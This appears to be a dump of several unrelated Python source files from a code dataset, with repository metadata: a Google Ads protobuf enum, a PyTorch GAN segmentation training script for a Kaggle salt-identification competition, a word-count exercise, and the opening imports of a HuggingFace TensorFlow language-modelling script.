] | permissive | GerhardusM/google-ads-python | 73b275a06e5401e6b951a6cd99af98c247e34aa3 | 676ac5fcb5bec0d9b5897f4c950049dac5647555 | refs/heads/master | 2022-07-06T19:05:50.932553 | 2022-06-17T20:41:17 | 2022-06-17T20:41:17 | 207,535,443 | 0 | 0 | Apache-2.0 | 2019-09-10T10:58:55 | 2019-09-10T10:58:55 | null | UTF-8 | Python | false | false | 1,262 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v9.enums",
marshal="google.ads.googleads.v9",
manifest={"AdGroupCriterionApprovalStatusEnum",},
)
class AdGroupCriterionApprovalStatusEnum(proto.Message):
r"""Container for enum describing possible AdGroupCriterion
approval statuses.
"""
class AdGroupCriterionApprovalStatus(proto.Enum):
r"""Enumerates AdGroupCriterion approval statuses."""
UNSPECIFIED = 0
UNKNOWN = 1
APPROVED = 2
DISAPPROVED = 3
PENDING_REVIEW = 4
UNDER_REVIEW = 5
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | GerhardusM.noreply@github.com |
e6c20e95b44435203bda1ee5f8f97dcf0b45d0bb | affdb1186825486d40c1140314cc04fe63b153b7 | /_old/tgs-salt-identification-challenge/single_models.py | 0b9213b95b7f44783979bdccf19a605f666c740d | [] | no_license | Yagami360/kaggle_exercises | 2f9a8a12c48a6e55ded6c626ceef5fb0cfca935b | 17b731bb6f1ce0b81254047ffc56371f4c485df0 | refs/heads/master | 2022-11-22T23:00:27.176123 | 2020-07-23T05:05:00 | 2020-07-23T05:05:00 | 252,343,652 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,479 | py | import os
import argparse
import numpy as np
import pandas as pd
import random
from tqdm import tqdm
import warnings
import json
import yaml
from matplotlib import pyplot as plt
import seaborn as sns
from PIL import Image
import cv2
#from skimage.transform import resize
from kaggle.api.kaggle_api_extended import KaggleApi
# sklearn
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
# PyTorch
import torch
from torch.utils.data import TensorDataset, DataLoader
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
from torchvision.utils import save_image
from tensorboardX import SummaryWriter
# 自作モジュール
from dataset import load_dataset, TGSSaltDataset, TGSSaltDataLoader
from models import UNet4, UNet4BottleNeck, GANimationGenerator, MGVTONResGenerator
from models import PatchGANDiscriminator, MultiscaleDiscriminator, GANimationDiscriminator
from models import ParsingCrossEntropyLoss, VGGLoss, VanillaGANLoss, LSGANLoss, HingeGANLoss, ConditionalExpressionLoss
from utils import save_checkpoint, load_checkpoint, convert_rle
from utils import board_add_image, board_add_images, save_image_w_norm
from utils import iou_metric, iou_metric_batch
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--exper_name", default="single_model_pytorch", help="実験名")
parser.add_argument("--dataset_dir", type=str, default="../datasets/competition_data")
parser.add_argument("--results_dir", type=str, default="results")
parser.add_argument("--submit_file", type=str, default="submission.csv")
parser.add_argument("--competition_id", type=str, default="tgs-salt-identification-challenge")
parser.add_argument("--train_mode", choices=["train", "test", "eval"], default="train", help="")
parser.add_argument("--model_type_G", choices=["unet4", "unet5", "unet4bottleneck", "mgvton", "ganimation"], default="unet4", help="生成器モデルの種類")
parser.add_argument("--model_type_D", choices=["patchgan", "multiscale", "ganimation"], default="patchgan", help="識別器モデルの種類")
parser.add_argument('--save_checkpoints_dir', type=str, default="checkpoints", help="モデルの保存ディレクトリ")
parser.add_argument('--load_checkpoints_path_G', type=str, default="", help="生成器モデルの読み込みファイルのパス")
parser.add_argument('--load_checkpoints_path_D', type=str, default="", help="識別器モデルの読み込みファイルのパス")
parser.add_argument('--tensorboard_dir', type=str, default="tensorboard", help="TensorBoard のディレクトリ")
parser.add_argument("--n_epoches", type=int, default=200, help="エポック数")
parser.add_argument('--batch_size', type=int, default=32, help="バッチサイズ")
parser.add_argument('--batch_size_test', type=int, default=1, help="バッチサイズ")
parser.add_argument('--lr', type=float, default=0.001, help="学習率")
parser.add_argument('--beta1', type=float, default=0.5, help="学習率の減衰率")
parser.add_argument('--beta2', type=float, default=0.999, help="学習率の減衰率")
parser.add_argument('--image_height_org', type=int, default=101, help="入力画像の高さ(pixel単位)")
parser.add_argument('--image_width_org', type=int, default=101, help="入力画像の幅(pixel単位)")
parser.add_argument('--image_height', type=int, default=128, help="入力画像の高さ(pixel単位)")
parser.add_argument('--image_width', type=int, default=128, help="入力画像の幅(pixel単位)")
parser.add_argument("--n_channels", type=int, default=1, help="チャンネル数")
parser.add_argument("--n_samplings", type=int, default=100000, help="ラベル数")
parser.add_argument('--data_augument', action='store_true')
parser.add_argument('--depth', action='store_true')
parser.add_argument("--val_rate", type=float, default=0.20)
parser.add_argument('--lambda_bce', type=float, default=1.0, help="クロスエントロピー損失関数の係数値")
parser.add_argument('--lambda_enpropy', type=float, default=1.0, help="クロスエントロピー損失関数の係数値")
parser.add_argument('--lambda_l1', type=float, default=0.0, help="L1損失関数の係数値")
parser.add_argument('--lambda_vgg', type=float, default=0.0, help="VGG perceptual loss_G の係数値")
parser.add_argument('--lambda_adv', type=float, default=1.0, help="Adv loss_G の係数値")
parser.add_argument('--adv_loss_type', choices=['vanilla', 'lsgan', 'hinge'], default="lsgan", help="GAN Adv loss の種類")
parser.add_argument('--lambda_cond', type=float, default=1000.0, help="conditional expression loss の係数値")
parser.add_argument("--n_diaplay_step", type=int, default=100,)
parser.add_argument("--n_save_epoches", type=int, default=50,)
parser.add_argument("--seed", type=int, default=71)
parser.add_argument('--device', choices=['cpu', 'gpu'], default="gpu", help="使用デバイス (CPU or GPU)")
parser.add_argument('--n_workers', type=int, default=4, help="CPUの並列化数(0 で並列化なし)")
parser.add_argument('--use_cuda_benchmark', action='store_true', help="torch.backends.cudnn.benchmark の使用有効化")
parser.add_argument('--use_cuda_deterministic', action='store_true', help="再現性確保のために cuDNN に決定論的振る舞い有効化")
parser.add_argument('--submit', action='store_true')
parser.add_argument('--debug', action='store_true')
args = parser.parse_args()
if( args.model_type_G == "unet4bottleneck" ):
args.depth = True
if( args.model_type_D == "ganimation" ):
args.depth = True
# 実験名を自動的に変更
if( args.exper_name == "single_model_pytorch" ):
if( args.train_mode in ["test", "eval"] ):
args.exper_name = "test_" + args.exper_name
args.exper_name += "_" + args.model_type_G
if( args.data_augument ):
args.exper_name += "_da"
if( args.depth ):
args.exper_name += "_depth"
args.exper_name += "_ep" + str(args.n_epoches)
args.exper_name += "_b" + str(args.batch_size)
args.exper_name += "_lr{}".format(args.lr)
args.exper_name += "_bce{}".format(args.lambda_bce)
args.exper_name += "_enpropy{}".format(args.lambda_enpropy)
args.exper_name += "_l1{}".format(args.lambda_l1)
args.exper_name += "_vgg{}".format(args.lambda_vgg)
args.exper_name += "_adv{}_{}".format(args.adv_loss_type, args.lambda_adv)
if( args.model_type_D == "ganimation" ):
args.exper_name += "_cond{}".format(args.lambda_cond)
if( args.debug ):
for key, value in vars(args).items():
print('%s: %s' % (str(key), str(value)))
if not os.path.isdir(args.results_dir):
os.mkdir(args.results_dir)
if not os.path.isdir( os.path.join(args.results_dir, args.exper_name) ):
os.mkdir(os.path.join(args.results_dir, args.exper_name))
if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "valid") ):
os.mkdir(os.path.join(args.results_dir, args.exper_name, "valid"))
if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "valid", "images") ):
os.mkdir(os.path.join(args.results_dir, args.exper_name, "valid", "images"))
if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "valid", "masks") ):
os.mkdir(os.path.join(args.results_dir, args.exper_name, "valid", "masks"))
if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "test") ):
os.mkdir(os.path.join(args.results_dir, args.exper_name, "test"))
if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "test", "images") ):
os.mkdir(os.path.join(args.results_dir, args.exper_name, "test", "images"))
if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "test", "masks") ):
os.mkdir(os.path.join(args.results_dir, args.exper_name, "test", "masks"))
if( args.train_mode in ["train"] ):
if not( os.path.exists(args.save_checkpoints_dir) ):
os.mkdir(args.save_checkpoints_dir)
if not( os.path.exists(os.path.join(args.save_checkpoints_dir, args.exper_name)) ):
os.mkdir( os.path.join(args.save_checkpoints_dir, args.exper_name) )
# 警告非表示
warnings.simplefilter('ignore', DeprecationWarning)
# 実行 Device の設定
if( args.device == "gpu" ):
use_cuda = torch.cuda.is_available()
if( use_cuda == True ):
device = torch.device( "cuda" )
#torch.cuda.set_device(args.gpu_ids[0])
print( "実行デバイス :", device)
print( "GPU名 :", torch.cuda.get_device_name(device))
print("torch.cuda.current_device() =", torch.cuda.current_device())
else:
print( "can't using gpu." )
device = torch.device( "cpu" )
print( "実行デバイス :", device)
else:
device = torch.device( "cpu" )
print( "実行デバイス :", device)
# seed 値の固定
if( args.use_cuda_deterministic ):
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(args.seed)
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
# for visualation
if( args.train_mode == "train" ):
board_train = SummaryWriter( log_dir = os.path.join(args.tensorboard_dir, args.exper_name) )
board_test = SummaryWriter( log_dir = os.path.join(args.tensorboard_dir, args.exper_name + "_test") )
#================================
# データセットの読み込み
#================================
df_submission = pd.read_csv( os.path.join(args.dataset_dir, "sample_submission.csv" ) )
# 学習用データセットとテスト用データセットの設定
ds_train = TGSSaltDataset( args, args.dataset_dir, datamode = "train", data_augument = args.data_augument, debug = args.debug )
ds_test = TGSSaltDataset( args, args.dataset_dir, datamode = "test", data_augument = False, debug = args.debug )
#dloader_train = TGSSaltDataLoader(ds_train, batch_size=args.batch_size, shuffle=True, n_workers=args.n_workers )
#dloader_test = TGSSaltDataLoader(ds_test, batch_size=args.batch_size_test, shuffle=False, n_workers=args.n_workers )
dloader_train = torch.utils.data.DataLoader(ds_train, batch_size=args.batch_size, shuffle=True, num_workers = args.n_workers, pin_memory = True )
dloader_test = torch.utils.data.DataLoader(ds_test, batch_size=args.batch_size_test, shuffle=False, num_workers = args.n_workers, pin_memory = True )
"""
X_train_img, y_train_mask, X_test_img, X_train_depth, X_test_depth, train_image_names, test_image_names \
= load_dataset(
dataset_dir = args.dataset_dir,
image_height_org = args.image_height, image_width_org = args.image_width_org,
image_height = args.image_height, image_width = args.image_width, n_channels = args.n_channels,
n_samplings = args.n_samplings,
debug = args.debug,
)
y_pred_train = np.zeros( y_train_mask.shape )
if( args.debug ):
print( "X_train_img.shape : ", X_train_img.shape )
print( "y_train_mask.shape : ", y_train_mask.shape )
print( "X_test_img.shape : ", X_test_img.shape )
print( "X_train_depth.shape : ", X_train_depth.shape )
print( "X_test_depth.shape : ", X_test_depth.shape )
"""
# 可視化
"""
max_images = 60
grid_width = 15
grid_height = int(max_images / grid_width)
fig, axs = plt.subplots(grid_height, grid_width, figsize=(grid_width, grid_height))
for idx in range(max_images):
img = X_train_img[idx] # 0.0f ~ 1.0f
mask = y_train_mask[idx] # 0.0f ~ 1.0f
ax = axs[int(idx / grid_width), idx % grid_width]
ax.imshow(img.squeeze(), cmap="Greys")
ax.imshow(mask.squeeze(), alpha=0.3, cmap="Greens")
ax.set_yticklabels([])
ax.set_xticklabels([])
plt.suptitle("images and masks [train]\nGreen: salt")
plt.savefig( os.path.join(args.results_dir, args.exper_name, "images_and_masks_train.png"), dpi = 300, bbox_inches = 'tight' )
"""
#================================
# 前処理
#================================
"""
# データセットの分割
X_train_img, X_valid_img, y_train_mask, y_valid_mask, train_image_names, image_names_valid, X_train_depth, X_valid_depth \
= train_test_split( X_train_img, y_train_mask, train_image_names, X_train_depth, test_size=args.val_rate, random_state=args.seed )
if( args.debug ):
print( "X_train_img.shape : ", X_train_img.shape )
print( "X_valid_img.shape : ", X_valid_img.shape )
print( "y_train_mask.shape : ", y_train_mask.shape )
print( "y_valid_mask.shape : ", y_valid_mask.shape )
print( "X_train_depth.shape : ", X_train_depth.shape )
print( "X_valid_depth.shape : ", X_valid_depth.shape )
"""
#================================
# モデルの構造を定義する。
#================================
# 生成器
if( args.model_type_G == "unet4" ):
if( args.depth ):
model_G = UNet4( n_in_channels = args.n_channels + 1, n_out_channels = args.n_channels, n_fmaps = 32,).to( device )
else:
model_G = UNet4( n_in_channels = args.n_channels, n_out_channels = args.n_channels, n_fmaps = 32,).to( device )
elif( args.model_type_G == "unet4bottleneck" ):
model_G = UNet4BottleNeck( n_in_channels = args.n_channels, n_out_channels = args.n_channels, n_fmaps = 32,).to( device )
elif( args.model_type_G == "mgvton" ):
if( args.depth ):
model_G = MGVTONResGenerator( input_nc = args.n_channels + 1, output_nc = args.n_channels, padding_type='zero', affine=False ).to( device )
else:
model_G = MGVTONResGenerator( input_nc = args.n_channels, output_nc = args.n_channels, padding_type='zero', affine=False ).to( device )
#model_G = MGVTONResGenerator( input_nc = args.n_channels, output_nc = args.n_channels, padding_type='reflect', affine=True ).to( device )
elif( args.model_type_G == "ganimation" ):
if( args.depth ):
model_G = GANimationGenerator( input_nc = args.n_channels + 1, output_nc = args.n_channels, conv_dim = 32 ).to( device )
else:
model_G = GANimationGenerator( input_nc = args.n_channels, output_nc = args.n_channels, conv_dim = 32 ).to( device )
# 識別器
if( args.model_type_D == "patchgan" ):
model_D = PatchGANDiscriminator( n_in_channels = args.n_channels, n_fmaps = 32 ).cuda()
elif( args.model_type_D == "multiscale" ):
model_D = MultiscaleDiscriminator( n_in_channels = args.n_channels, n_fmaps = 32, n_dis = 3 ).cuda()
elif( args.model_type_D == "ganimation" ):
model_D = GANimationDiscriminator( n_in_channels = args.n_channels, n_fmaps = 32, feat_dim = 1 ).cuda()
if( args.debug ):
print( "model_G :\n", model_G )
print( "model_D :\n", model_D )
# モデルを読み込む
if not args.load_checkpoints_path_G == '' and os.path.exists(args.load_checkpoints_path_G):
load_checkpoint(model_G, device, args.load_checkpoints_path_G )
if not args.load_checkpoints_path_D == '' and os.path.exists(args.load_checkpoints_path_D):
load_checkpoint(model_D, device, args.load_checkpoints_path_D )
#================================
# optimizer_G の設定
#================================
optimizer_G = optim.Adam(
params = model_G.parameters(),
lr = args.lr, betas = (args.beta1,args.beta2)
)
optimizer_D = optim.Adam(
params = model_D.parameters(),
lr = args.lr, betas = (args.beta1,args.beta2)
)
#================================
# loss_G 関数の設定
#================================
loss_l1_fn = nn.L1Loss()
loss_vgg_fn = VGGLoss(device)
loss_entropy_fn = ParsingCrossEntropyLoss()
loss_bce_fn = nn.BCEWithLogitsLoss()
if( args.adv_loss_type == "vanilla" ):
loss_adv_fn = VanillaGANLoss()
elif( args.adv_loss_type == "lsgan" ):
loss_adv_fn = LSGANLoss()
elif( args.adv_loss_type == "hinge" ):
loss_adv_fn = HingeGANLoss()
else:
loss_adv_fn = LSGANLoss()
if( args.model_type_D == "ganimation" ):
loss_cond_fn = ConditionalExpressionLoss()
#================================
# モデルの学習
#================================
if( args.train_mode == "train" ):
print("Starting Training Loop...")
n_print = 1
step = 0
for epoch in tqdm( range(args.n_epoches), desc = "Epoches" ):
# DataLoader から 1minibatch 分取り出し、ミニバッチ処理
for iter, inputs in enumerate( tqdm( dloader_train, desc = "minbatch iters" ) ):
model_G.train()
model_D.train()
# 一番最後のミニバッチループで、バッチサイズに満たない場合は無視する(後の計算で、shape の不一致をおこすため)
if inputs["image"].shape[0] != args.batch_size:
break
# ミニバッチデータを GPU へ転送
image_name = inputs["image_name"]
image = inputs["image"].to(device)
mask = inputs["mask"].to(device)
depth = inputs["depth"].to(device)
if( args.debug and n_print > 0):
print( "image.shape : ", image.shape )
print( "mask.shape : ", mask.shape )
print( "depth.shape : ", depth.shape )
#====================================================
# 学習処理
#====================================================
#----------------------------------------------------
# 生成器 の forword 処理
#----------------------------------------------------
# 学習用データをモデルに流し込む
if( args.model_type_G in ["unet4bottleneck"] ):
output = model_G( image, depth )
else:
if( args.depth ):
depth = depth.expand(depth.shape[0], depth.shape[1], image.shape[2], image.shape[3] )
concat = torch.cat( [image, depth], dim=1)
output = model_G( concat )
else:
output = model_G( image )
if( args.debug and n_print > 0 ):
print( "output.shape :", output.shape )
#----------------------------------------------------
# 識別器の更新処理
#----------------------------------------------------
# 無効化していた識別器 D のネットワークの勾配計算を有効化。
for param in model_D.parameters():
param.requires_grad = True
# 学習用データをモデルに流し込む
if( args.model_type_D == "ganimation" ):
d_real, d_real_depth = model_D( output )
d_fake, d_fake_depth = model_D( output.detach() )
if( args.debug and n_print > 0 ):
print( "d_real.shape :", d_real.shape )
print( "d_fake.shape :", d_fake.shape )
print( "d_real_depth.shape :", d_real_depth.shape )
print( "d_fake_depth.shape :", d_fake_depth.shape )
else:
d_real = model_D( output )
d_fake = model_D( output.detach() )
if( args.debug and n_print > 0 ):
print( "d_real.shape :", d_real.shape )
print( "d_fake.shape :", d_fake.shape )
# 損失関数を計算する
loss_D, loss_D_real, loss_D_fake = loss_adv_fn.forward_D( d_real, d_fake )
if( args.model_type_D == "ganimation" ):
loss_D_cond_depth = loss_cond_fn( d_real_depth, depth[:,:,0,0] ) + loss_cond_fn( d_fake_depth, depth[:,:,0,0] )
loss_D = loss_D + args.lambda_cond * loss_D_cond_depth
# ネットワークの更新処理
optimizer_D.zero_grad()
loss_D.backward(retain_graph=True)
optimizer_D.step()
# 無効化していた識別器 D のネットワークの勾配計算を有効化。
for param in model_D.parameters():
param.requires_grad = False
#----------------------------------------------------
# 生成器の更新処理
#----------------------------------------------------
# 損失関数を計算する
loss_l1 = loss_l1_fn( output, mask )
if( args.n_channels == 3 ):
loss_vgg = loss_vgg_fn( output, mask )
loss_entropy = loss_entropy_fn( output, mask )
loss_bce = loss_bce_fn( output, mask )
loss_adv = loss_adv_fn.forward_G( d_fake )
if( args.n_channels == 3 ):
loss_G = args.lambda_l1 * loss_l1 + args.lambda_vgg * loss_vgg + args.lambda_enpropy * loss_entropy + args.lambda_bce * loss_bce + args.lambda_adv * loss_adv
else:
loss_G = args.lambda_l1 * loss_l1 + args.lambda_enpropy * loss_entropy + args.lambda_bce * loss_bce + args.lambda_adv * loss_adv
if( args.model_type_D == "ganimation" ):
loss_G_cond_depth = loss_cond_fn( d_real_depth, depth[:,:,0,0] ) + loss_cond_fn( d_fake_depth, depth[:,:,0,0] )
loss_G = loss_G + args.lambda_cond * loss_G_cond_depth
# ネットワークの更新処理
optimizer_G.zero_grad()
loss_G.backward()
optimizer_G.step()
#====================================================
# 学習過程の表示
#====================================================
if( step == 0 or ( step % args.n_diaplay_step == 0 ) ):
board_train.add_scalar('G/loss_G', loss_G.item(), step)
board_train.add_scalar('G/loss_l1', loss_l1.item(), step)
if( args.n_channels == 3 ):
board_train.add_scalar('G/loss_vgg', loss_vgg.item(), step)
board_train.add_scalar('G/loss_entropy', loss_entropy.item(), step)
board_train.add_scalar('G/loss_bce', loss_bce.item(), step)
board_train.add_scalar('G/loss_adv', loss_adv.item(), step)
if( args.model_type_D == "ganimation" ):
board_train.add_scalar('G/loss_G_cond_depth', loss_G_cond_depth.item(), step)
board_train.add_scalar('D/loss_D', loss_D.item(), step)
board_train.add_scalar('D/loss_D_real', loss_D_real.item(), step)
board_train.add_scalar('D/loss_D_fake', loss_D_fake.item(), step)
if( args.model_type_D == "ganimation" ):
board_train.add_scalar('D/loss_D_cond_depth', loss_D_cond_depth.item(), step)
if( args.n_channels == 3 ):
print( "step={}, loss_G={:.5f}, loss_l1={:.5f}, loss_vgg={:.5f}, loss_entropy={:.5f}, loss_bce={:.5f}, loss_adv={:.5f}".format(step, loss_G, loss_l1, loss_vgg, loss_entropy, loss_bce, loss_adv) )
print( "step={}, loss_D={:.5f}, loss_D_real={:.5f}, loss_D_fake={:.5f}".format(step, loss_D.item(), loss_D_real.item(), loss_D_fake.item()) )
if( args.model_type_D == "ganimation" ):
print( "step={}, loss_G_cond_depth={:.5f}".format(step, loss_G_cond_depth,) )
print( "step={}, loss_D_cond_depth={:.5f}".format(step, loss_D_cond_depth,) )
else:
print( "step={}, loss_G={:.5f}, loss_l1={:.5f}, loss_entropy={:.5f}, loss_bce={:.5f}, loss_adv={:.5f}".format(step, loss_G, loss_l1, loss_entropy, loss_bce, loss_adv) )
print( "step={}, loss_D={:.5f}, loss_D_real={:.5f}, loss_D_fake={:.5f}".format(step, loss_D.item(), loss_D_real.item(), loss_D_fake.item()) )
if( args.model_type_D == "ganimation" ):
print( "step={}, loss_G_cond_depth={:.5f}".format(step, loss_G_cond_depth,) )
print( "step={}, loss_D_cond_depth={:.5f}".format(step, loss_D_cond_depth,) )
visuals = [
[image, mask, output],
]
board_add_images(board_train, 'images', visuals, step+1)
step += 1
n_print -= 1
#====================================================
# モデルの保存
#====================================================
if( epoch % args.n_save_epoches == 0 ):
save_checkpoint( model_G, device, os.path.join(args.save_checkpoints_dir, args.exper_name, 'model_ep%03d.pth' % (epoch)) )
save_checkpoint( model_G, device, os.path.join(args.save_checkpoints_dir, args.exper_name, 'model_final.pth') )
print( "saved checkpoints" )
save_checkpoint( model_G, device, os.path.join(args.save_checkpoints_dir, args.exper_name, 'model_final.pth') )
print("Finished Training Loop.")
#================================
# モデルの推論処理
#================================
print("Starting Test Loop...")
n_print = 1
y_pred_test = []
test_image_names = []
model_G.eval()
for step, inputs in enumerate( tqdm( dloader_test, desc = "Samplings" ) ):
if inputs["image"].shape[0] != args.batch_size_test:
break
image_name = inputs["image_name"]
test_image_names.append(image_name[0])
image = inputs["image"].to(device)
depth = inputs["depth"].to(device)
# 生成器 G の 推論処理
with torch.no_grad():
if( args.model_type_G in ["unet4bottleneck"] ):
output = model_G( image, depth )
else:
if( args.depth ):
depth = depth.expand(depth.shape[0], depth.shape[1], image.shape[2], image.shape[3] )
concat = torch.cat( [image, depth], dim=1)
output = model_G( concat )
else:
output = model_G( image )
y_pred_test.append( output[0].detach().cpu().numpy() )
if( args.debug and n_print > 0 ):
print( "output.shape :", output.shape )
print( "type(output) :", type(output) )
if( step <= 10 ):
save_image_w_norm( image, os.path.join( args.results_dir, args.exper_name, "test", "images", image_name[0] ) )
save_image_w_norm( output, os.path.join( args.results_dir, args.exper_name, "test", "masks", image_name[0] ) )
if( step >= args.n_samplings ):
break
n_print -= 1
y_pred_test = np.array( y_pred_test )
print( "type(y_pred_test) : ", type(y_pred_test) )
print( "y_pred_test.shape : ", y_pred_test.shape )
#================================
# 可視化処理
#================================
# IoU
"""
thresholds = np.linspace(0, 1, 50) # IoU スコアの低い結果を除外するためのスレッショルド
ious = np.array( [iou_metric_batch(y_valid_mask, np.int32(y_pred_train > threshold)) for threshold in thresholds] )
threshold_best_index = np.argmax(ious[9:-10]) + 9
iou_best = ious[threshold_best_index]
threshold_best = thresholds[threshold_best_index] # ?
print( "iou_best = {:0.4f} ".format(iou_best) )
print( "threshold_best = {:0.4f} ".format(threshold_best) )
fig, axs = plt.subplots()
axs.plot(thresholds, ious)
axs.plot(threshold_best, iou_best, "xr", label="Best threshold")
plt.xlabel("Threshold")
plt.ylabel("IoU")
plt.title("Threshold vs IoU ({}, {})".format(threshold_best, iou_best))
plt.grid()
plt.legend()
plt.savefig( os.path.join(args.results_dir, args.exper_name, "IoU.png"), dpi = 300, bbox_inches = 'tight' )
"""
# 元画像と生成マスク画像の重ね合わせ(test)
"""
max_images = 60
grid_width = 15
grid_height = int(max_images / grid_width)
fig, axs = plt.subplots(grid_height, grid_width, figsize=(grid_width, grid_height))
for i, name in enumerate(test_image_names[0:max_images]):
img = X_test_img[i]
mask = np.array(np.round(y_pred_test[i] > threshold_best), dtype=np.float32)
ax = axs[int(i / grid_width), i % grid_width]
ax.imshow(img.squeeze(), cmap="Greys")
ax.imshow(mask.squeeze(), alpha=0.3, cmap="Greens")
ax.set_yticklabels([])
ax.set_xticklabels([])
plt.suptitle("images and masks [test]\nGreen: salt")
plt.savefig( os.path.join(args.results_dir, args.exper_name, "images_and_masks_test.png"), dpi = 300, bbox_inches = 'tight' )
"""
# 元画像と生成マスク画像の重ね合わせ(valid)
"""
max_images = 60
grid_width = 15
grid_height = int(max_images / grid_width)
fig, axs = plt.subplots(grid_height, grid_width, figsize=(grid_width, grid_height))
for i, name in enumerate(image_names_valid[0:max_images]):
img = X_valid_img[i]
mask = y_valid_mask[i]
pred_mask = np.array(np.round(y_pred_train[i] > threshold_best), dtype=np.float32)
ax = axs[int(i / grid_width), i % grid_width]
ax.imshow(img.squeeze(), cmap="Greys")
ax.imshow(mask.squeeze(), alpha=0.3, cmap="Greens")
ax.imshow(pred_mask.squeeze(), alpha=0.3, cmap="OrRd")
ax.set_yticklabels([])
ax.set_xticklabels([])
plt.suptitle("images and masks [train]\nGreen: salt [correct], Red: salt [predict]")
plt.savefig( os.path.join(args.results_dir, args.exper_name, "images_and_masks_valid.png"), dpi = 300, bbox_inches = 'tight' )
"""
#================================
# Kaggle API での submit
#================================
# RLE [Run Length Encoding] 形式で提出のため生成画像を元の画像サイズに変換
y_pred_test_org = np.zeros( (len(y_pred_test), args.image_height_org, args.image_width_org), dtype=np.float32 )
for i in range(len(y_pred_test)):
y_pred_test_org[i] = cv2.resize( y_pred_test[i,0,:,:].squeeze(), (args.image_height_org, args.image_width_org), interpolation = cv2.INTER_NEAREST )
#y_pred_test_org[i] = resize( y_pred_test[i,0,:,:].squeeze(), (args.image_height_org, args.image_width_org), mode='constant', preserve_range=True )
# 提出用データに値を設定
y_sub = { name.split(".png")[0] : convert_rle(np.round(y_pred_test_org[i] > 0.0)) for i,name in enumerate(test_image_names) }
df_submission = pd.DataFrame.from_dict( y_sub, orient='index' )
df_submission.index.names = ['id']
df_submission.columns = ['rle_mask']
df_submission.to_csv( os.path.join(args.results_dir, args.exper_name, args.submit_file) )
if( args.submit ):
# Kaggle-API で submit
api = KaggleApi()
api.authenticate()
api.competition_submit( os.path.join(args.results_dir, args.exper_name, args.submit_file), args.exper_name, args.competition_id)
os.system('kaggle competitions submissions -c {}'.format(args.competition_id) )
| [
"y034112@gmail.com"
] | y034112@gmail.com |
baab7d0a2eeef70ff34b1be7b72ce3daea803683 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/word-count/fe23ec94d69343a3a5a10f713adfd463.py | d52d5cd350e7bed379f1fefa4f8f22ad9bfdec49 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 251 | py | # -*-coding: utf-8-*-
#! /usr/bin/env python3
def word_count(string):
string = string.split()
dico = {}
for word in string:
if word not in dico:
dico[word] = 1
else:
dico[word] += 1
return dico
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
95eaf4108b1e03703c58036d4c2bf1b66f4e0539 | e8a48749014f372633de65d79bfa26a3ad743d89 | /examples/tensorflow/language-modeling/run_clm.py | 46c8d339d970c3d2396d5e090afc7a15e4ea339d | [
"Apache-2.0"
] | permissive | pvcastro/pytorch-pretrained-BERT | 183b7291972c8d8c66c995647df66c1fe439a763 | 49cd736a288a315d741e5c337790effa4c9fa689 | refs/heads/master | 2022-08-19T08:55:16.332585 | 2022-06-30T16:11:08 | 2022-06-30T16:11:08 | 168,367,637 | 1 | 0 | Apache-2.0 | 2019-01-30T15:39:42 | 2019-01-30T15:39:41 | null | UTF-8 | Python | false | false | 23,558 | py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT-2, GPT-Neo...)
on a text file or a dataset without using HuggingFace Trainer.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own clm task. Pointers for this are left as comments.
# region Imports
import logging
import math
import os
import random
import sys
from dataclasses import dataclass, field
from itertools import chain
from pathlib import Path
from typing import Optional
import datasets
import tensorflow as tf
from datasets import load_dataset
from sklearn.model_selection import train_test_split
import transformers
from transformers import (
CONFIG_MAPPING,
CONFIG_NAME,
TF2_WEIGHTS_NAME,
TF_MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoTokenizer,
DefaultDataCollator,
HfArgumentParser,
TFAutoModelForCausalLM,
TFTrainingArguments,
create_optimizer,
set_seed,
)
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
logger = logging.getLogger(__name__)
require_version("datasets>=1.8.0", "To fix: pip install -r examples/tensorflow/language-modeling/requirements.txt")
